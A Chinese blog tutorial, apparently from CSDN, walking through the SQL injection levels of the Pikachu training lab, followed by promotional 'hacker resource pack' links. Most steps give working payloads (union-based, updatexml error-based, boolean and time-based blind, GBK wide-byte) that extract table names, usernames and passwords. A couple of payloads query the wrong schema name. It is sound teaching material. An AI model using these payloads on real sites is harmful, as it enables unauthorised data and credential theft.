Pikachu(皮卡丘)靶场中SQL注入,零基础入门到精通,收藏这篇就够了

最新推荐文章于 2025-11-24 15:52:05 发布
原创 最新推荐文章于 2025-11-24 15:52:05 发布 · 738 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #集成测试

Pikachu靶场中SQL注入
  • 1.Pikachu(皮卡丘)靶场中SQL注入
    • 1.1.数字型注入
    • 1.2.字符型注入
    • 1.3.搜索型注入
    • 1.4.xx型注入
    • 1.5.insert/update注入
    • 1.6.delete注入
    • 1.7.http头注入
    • 1.8.盲注(base on boolian)
    • 1.9.盲注(base on time)
    • 1.10.宽字节注入

1.Pikachu(皮卡丘)靶场中SQL注入

若遇到不链接的可以参考我的一篇文章,里面包括了绝大部分的注入方式,并且配合案例演示。链接:SQL注入基础原理与案例(超详细)

1.1.数字型注入

1)其实这里能够看到和dvwa靶场中的medium级别差不多,没有地方进行注入,只能进行抓包测试。
在这里插入图片描述

2)这里和上面的low级别一样,采用正常的联合查询。并且这里已经提示是数字型注入了,那么这里就不进行注入类型测试。直接查询显示位。
输入1 order by 3#发现报错,那么这里的数据库的列为1和2。

1 order by 3#

在这里插入图片描述

3)查询显示位名,输入-1 union select 1,2#

-1 union select 1,2#

在这里插入图片描述

4)查询数据库名,输入-1 union select database(),2#获取数据库名为:pikachu。

-1 union select database(),2#

在这里插入图片描述

5)获取数据库的表,输入-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=“pikachu”# 通过获取到的数据库表,我们只需要里面的users。

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu"#

在这里插入图片描述

6)获取数据库的列,输入-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#获取到数据库的所有列,而在里面我们只需要username和password。

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#

在这里插入图片描述

7)获取数据库的账号密码,输入-1 union select group_concat(username),group_concat(password) from users#获得账号密码,密码是加密的,可以进行解密就能获取到了。

-1 union select group_concat(username),group_concat(password) from users#

在这里插入图片描述

1.2.字符型注入

1)这里已经告诉了是字符型注入,但是还是需要测试一下什么闭合。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。

kobe' and 1=1# 正常
kobe' and 1=2# 不正常

在这里插入图片描述

2)后面的注入方式和数字型基本一直,这里我就随便找几步进行测试。比如这里测试显示位。输入kobe’ order by 3#,就出现了报错。

kobe' order by 3#

在这里插入图片描述

3)查询数据库名,输入1’ union select database(),2#,上面是kobe而这里使用1就是为了让前面报错,执行后面的语句。

1' union select database(),2#

在这里插入图片描述

4)后面方式的和数字型注入都是一样的。

1.3.搜索型注入

1)这里的搜索型注入和上面的字符注入都是一样的,唯一的不同点是在里面需要使用%进行闭合,这个%是在源码中采用模糊查询,所使用到的,所以在我们注入的时候需要对这个%进行闭合。那么这里测试使用上面闭合的时候就需要输入k%’ and 1=1#这样就能够正常显示数据,当输入k%’ and 1=2#的时候就无法显示数据了。

k%' and 1=1#正常
k%' and 1=2#不正常

在这里插入图片描述

2)这里我们也不一步一步测试了,直接获取数据库输入k%’ union select database(),2,3#,可以看到我们也顺利获取数据库了。

k%' union select database(),2,3#

在这里插入图片描述

1.4.xx型注入

1)通过对输入的内容进行测试发现当输入kobe’) and 1=1#页面能够正常显示,而kobe’) and 1=2#则不能正常显示。那么这基本上可以判断此处是采用’)进行闭合。

kobe') and 1=1#正常
kobe') and 1=2#不正常

在这里插入图片描述

2)知道闭合了,那么就可以测试显示位了。这我测试得到的数据库是两列,而且输入kobe’) union select 1,2#后得到了显示位。

kobe') union select 1,2#

在这里插入图片描述

3)我们这里依旧只测试到获取数据库,其他的和数字型注入基本一直,除了闭合方式。kobe’) union select database(),2#,爆出数据库名。

kobe') union select database(),2#

在这里插入图片描述

1.5.insert/update注入

这里只是在注册处进行测试,当然还有修改信息的时候同样能够进行注入,可以自行测试。
  1)这里就需要先进行注册,填入必填项,然后抓包。
在这里插入图片描述

2)把数据发入重放器中,并使用报错注入,在用户名后输入’ and updatexml(1,0x7e,3)and '进行测试,可以看到有报错回复。

' and updatexml(1,0x7e,3)and '

在这里插入图片描述

3)爆出数据库名,当输入’ and updatexml(1,concat(0x7e,database()),3) and '的时候就能够爆出数据库名,数据库名为pikachu。

' and updatexml(1,concat(0x7e,database()),3) and '

在这里插入图片描述

4)爆出数据库的表名,这里我们通过报错注入,获取到数据库的表名,但是我们只要users,其他的不感兴趣。主要是也用不到。

'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu' )),3) and '

在这里插入图片描述

5)爆出数据库的列名,当然这里是通过分页显示的,若不分页,显示的不全。

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),3)and '

在这里插入图片描述

6)爆出账号密码,都需要通过分页进行显示,若不分页则无法显示完全。

账号:' and updatexml(1,concat(0x7e,(select username from users limit 0,1 )),3)and '

在这里插入图片描述

密码:' and updatexml(1,concat(0x7e,(select password from users limit 0,1 )),3)and '

在这里插入图片描述

1.6.delete注入

1)这里先随便在留言板上输些内容,然后随便删除一个留言,并对其抓包。这里就会发现存在一个ID,可以对其进行注入测试。由于这里我们删除后并不会出现什么提示,所以这里使用报错注入测试。并且经过测试是数字型,字符型不会出现报错的内容。并且需要注意这里空格需要写出+或者%20。

id=57+and+updatexml(1,0x7e,3)

在这里插入图片描述

2)后续的注入测试和insert/update注入一样

1.7.http头注入

1)这里其实可以发现在登录后显示出很多信息,可以对这些显示信息的字段进行测试。
在这里插入图片描述

2)我们刷新页面重新抓包,经过测试发现在User-Agent: 和Accept:处可以进行注入。 这里我们就在User-Agent:进行测试。

' and updatexml(1,0x7e,3)and '

在这里插入图片描述

3)剩下的步骤和之前的一样的操作,这里就不过多操作了。

1.8.盲注(base on boolian)

1)在一些特定的情况下,会对报错信息进行隐藏,那么就无法使用报错进行注入。像这个就需要使用布尔盲注。
在这里插入图片描述

2)判断注入类型,通过对注入类型的判断,可以发现是使用单引号闭合。

kobe' and 1=1# 正常
kobe' and 1=2# 不正常

在这里插入图片描述

3)判断数据库名的长度,通过之前获取到的数据库名是pikachu。一共7位,当然在实际的环境中需要手动一步一步测试。

kobe' and length(database())>8# 不正常
kobe' and length(database())=7# 正常

在这里插入图片描述

4)判断数据库的名,判断数据库名需要一个一个字母测试,通过比对后,获取到的数据库名为pikachu,当然也可以使用ascii函数来进行获取。

kobe' and left(database(),1)='p'# 正常
kobe' and left(database(),2)='pi'# 正常
.........
kobe' and left(database(),7)='pikachu'# 正常

在这里插入图片描述

5)猜测数据库表的数量

kobe' and (select count(table_name) from information_schema.tables where table_schema=database())>5# 不正常
kobe' and (select count(table_name) from information_schema.tables where table_schema=database())=5# 正常

在这里插入图片描述

6)猜测数据库表名,这里也只猜测一个案例,其他的还需自己动手测试。这里我们通过之前获取到的数据库表名有httpinfo…users。
第一个表第一个字母是h。

kobe' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0, 1),1,1))=104# 正常

在这里插入图片描述

第四个表第二个字母是s。

kobe' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3, 1),2,1))=115# 正常

在这里插入图片描述

7)判断列有多少列,比如这里我判断user有多少列。

kobe' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=4#

在这里插入图片描述

8)判断列中第一个列名的长度,通过控制limit的值来判断不同字段的长度。

kobe' and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))=2 #

在这里插入图片描述

9)判断列名,比如这里我就判断id,那么id的一个字母是i在ascii码中是105,所以正常,第二列需要变更limit后面的值来实现。通过获取,获得id列、username列、password列。

第一列第一个字母:kobe' and ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105#

在这里插入图片描述

第二列第二个字母:kobe' and ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),2,1))=115#

在这里插入图片描述

10)获取username中第一行数据的长度,若想测试第二行,那么修改limit的值即可。

kobe' and length((select username from users limit 0,1))=5#

在这里插入图片描述

11)获取username中第一行第一个字母的值。通过获取得到的值是a,整体是admin。

kobe' and ord(substr((select username from users limit 0,1),1,1))=97#

在这里插入图片描述

12)若想获取username中第二行第二个值怎么获取?可以通过修改limit的值进行获取。

kobe' and ord(substr((select username from users limit 1,1),2,1))=105#

在这里插入图片描述

1.9.盲注(base on time)

1)时间盲注,可以在对话框中输入用户名,不显示是否正确,那么这时候就需要使用到时间盲注。
在这里插入图片描述

2)使用时间盲注进行测试。这里使用原来的什么and 1=2啥的都不行了,需要使用时间盲注来测试,这里先测试闭合方式。

kobe and sleep(5)# 没有延迟
kobe' and sleep(5)# 延迟五秒

在这里插入图片描述

3)判断数据库名的长度,这里为了反应快点,把正确和错误的位置调整一下,把 sleep (5),1 调整为 sleep (1),5 意思就是正确了秒回,不正确则延迟5 秒返回。

kobe' and if(length(database())=7, sleep(1),5)#

在这里插入图片描述

4)判断数据库名。

kobe' and if((select substr(database(),1,1))='p',sleep(1),5)#

在这里插入图片描述

5)判断数据库内表的个数。

kobe' and if((select count(table_name) from information_schema.tables where table_schema=database())=5,sleep(1),5)#

在这里插入图片描述

6)判断第一个表的长度。

kobe' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=8,sleep(1),5)#

在这里插入图片描述

7)判断第一个表第一个字母。

kobe' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104,sleep(1),5)#

在这里插入图片描述

8)其实时间盲注整体上基本就是在布尔盲注的基础上增加if判断,并且与sleep配合,布尔盲注是当对的时候,返回正确的值,错误的时候返回错误的值,而时间盲注,不管正确还是错误都不会返回值,需要靠延迟判断。

1.10.宽字节注入

1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。
  2)测试宽字节注入,和联合注入是一样的只是在内容后面添加%df即可,通过在内容输入处输入内容,然后修改。比如获取显示位。

1%df' union select 1,2#

在这里插入图片描述

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 8428
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入(3)输入的SQL语句能否不报错(我们的语句能成功闭合)(selectusername,passwordf。......
pikachu-sql注入皮卡丘
twowords的博客
08-04 2382
数字型注入(post) post注入方式,可用BurpSuite进行抓包,发送到Repeater模块进行id值的修改 数字型注入 则不需要添加字符 payload: or 1=1 字符型注入(get) 字符型注入 当输入1'时 有报错信息''1'''可以看到源name值由单引号''包裹 可以用 '进行闭合 并用#注释掉后边内容 payload: 1' or 1=1 # 搜索型注入 根据提示 我们可以输入用户名一部分进行查询 并添加字符'如下图 并显示报错 由报错信息可以看到需要加%'进
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 6365
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4625
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu(皮卡丘)靶场 sql数字型注入 详细讲解
2401_89382898的博客
04-30 1041
这里我详细解释一下table_name,information_schema.tables,table_schema(我第一次学的时候想好久没想明白)id=1 union select 1,2 (随便2个数字)(1)将id=1改为id=1 and 1=1(页面正常)(2)将id=1改为id=1 and 1=2(页面报错)2.通过order by语句判断有几个注入点()(1)id=1 order by 2(页面正常)(2)id=1 order by 3(页面报错)1.判断是否有注入点。
Pikachu靶场-SQL注入
Ee_CN的博客
09-20 2108
语法:User-Agent: 1' and updatexml(1,concat(2,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu')),3) or ' 1=1。
pikachu靶场通关笔记23 SQL注入06-delete注入(报错法)
mooyuan的网络安全博客
06-10 1338
本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对delete注入关卡源码的代码审计找到安全风险的真实原因,讲解delete注入的原理并进行渗透实践,本文为SQL注入06之delete注入关卡的渗透部分。
SQL注入-Pikachu靶场通关_pikachu靶场通关sql
2401_84254530的博客
07-21 1777
时间盲注整体上基本就是在布尔盲注的基础上增加if判断,并且与sleep配合,布尔盲注是当对的时候,返回正确的值,错误的时候返回错误的值,而时间盲注,不管正确还是错误都不会返回值,需要靠延迟判断。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
pikachu靶场通关笔记20 SQL注入03-搜索型注入(GET)
mooyuan的网络安全博客
06-07 1256
本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对搜索型注入关卡源码的代码审计找到SQL安全风险的真实原因,讲解搜索型注入的原理并进行渗透实践,本文为SQL注入03之搜索型注入关卡的渗透部分。
Pikachu靶场sql注入通关
oiadkt的博客
03-07 7384
pickchu—sql注入通关
Pikachu靶场SQL注入、远程代码执行、文件包含漏洞
Jach1n
02-01 1152
Pikachu靶场SQL注入、远程代码执行、文件包含漏洞
pikachu靶场SQL-Inject中的搜索型注入、xx型注入和“insert/update“注入
GAO+的博客
10-09 1003
回显注册成功的界面,接着使用报错注入使得数据显示在报错页面。查用户数据,需要substr()函数查看完整数据。得到以下查询结果,参数也同样直接拼接在URL中。函数使得返回的结果从第32位开始显示31位长度。同样也显示不完整,需要substr()函数。得到以下结果,参数直接拼接在URL中。换一个username之后可以查询。提交后抓包,可以看到提交的内容。登录后的个人信息编辑界面。在其中添加单引号,有报错。尝试万能密码未果,注册。但是没有完整显示,使用。
pikachu靶机-sql注入
C-HOWE的博客
01-20 1650
文章旨在为网络安全渗透测试靶机复现学习(内容学习中,仅供参考)。通过阅读本文,读者将能对渗透pikachu靶场SQL注入模块有一定的了解。
pikachu靶场SQL注入基于布尔的盲注)python实现
记录学习
05-20 904
用python脚本实现布尔盲注
高并发数据库MySQL/PostgreSQL/NoSQL优化在互联网系统实践经验分享
最新发布
2501_94114711的博客
11-24 265
架构设计与分库分表主从/主主复制、分库分表、NoSQL分布式集群提高高并发读写能力和系统可用性索引与查询优化合理索引、SQL优化、聚合分页优化避免全表扫描和复杂JOIN高并发写入与缓存优化批量写入、异步处理、队列削峰热点数据缓存、读写分离策略监控与工程化闭环QPS、慢查询、锁等待、节点健康监控自动化部署、弹性扩容、压测优化形成持续闭环通过合理的数据库架构设计、索引与查询优化、高并发写入与缓存策略,以及监控与工程化部署,高并发互联网系统能实现高吞吐、低延迟、稳定可靠、可扩展。
SQL 注入详解:原理、危害与防范措施
2509_94107200的博客
11-24 218
SQL注入是一种常见的安全漏洞,攻击者通过在应用程序中插入恶意的SQL代码,诱使数据库执行非授权的操作。这种攻击通常发生在应用程序没有正确过滤或转义用户输入的情况下,导致攻击者能操控数据库查询,从而获取、修改或删除数据。SQL注入是一个严重的安全问题,开发者必须采取有效措施来预防。使用预编译语句、严格验证用户输入、遵循最小权限原则等都是防范SQL注入的有效手段。此外,定期的安全审查和测试也是保障应用安全的重要环节。通过这些措施,可以大大降低SQL注入的风险,保护应用程序和用户数据的安全。
mybatis 是如何防止 sql 注入
ThisIsMirror的博客
11-24 739
MyBatis 防 SQL 注入的核心是优先使用#{}占位符(依赖 JDBC 预编译),从根源上隔离用户输入和 SQL 语法;对于必须使用${}的场景,通过「白名单校验+手动转义」限制输入;配合类型校验、数据库权限控制等兜底机制,形成完整防护。凡是用户输入的内容,一律用#{}接收;动态表名、排序字段等非用户输入场景,用${}并严格校验,就能避免 99% 以上的 SQL 注入风险。
Spark SQL 简介
好记性不如烂笔头
11-23 544
Spark SQL 是 Spark 用于结构化数据处理的模块,对于开发人员来讲,Spark SQL 可以简化 RDD 的开发,提高开发效率,且执行效率非常快,所以实际工作中,基本上采用的就是 Spark SQL。Spark SQL 为了简化 RDD 的开发,提高开发效率,提供了两个编程抽象,类似 Spark Core 中的 RDD。即 DataFrame 和 DataSet。
SQL Server所有数据类型大全
2509_94081922的博客
11-22 594
【代码】SQL Server所有数据类型大全。
pikachu靶场sql注入
07-27
Pikachu靶场中,有多种类型的SQL注入漏洞可以进行测试和学习。这些类型包括数字型注入、字符型注入、搜索型注入、xx型注入、insert/update注入、delete注入、http头注入、盲注(基于布尔值)和盲注(基于时间)以及宽字节注入等。你可以使用工具如sqlmap来进行注入测试,通过构造恶意的SQL语句来获取数据库中的信息。例如,使用sqlmap命令可以指定目标URL和参数,然后进行注入测试,获取数据库中的表信息。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [Pikachu漏洞靶场系列之SQL注入](https://blog.youkuaiyun.com/weixin_45868644/article/details/120237977)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [pikachu靶场通关之sql注入系列](https://blog.youkuaiyun.com/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Pikachu(皮卡丘)靶场SQL注入](https://blog.youkuaiyun.com/weixin_44268918/article/details/128317939)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值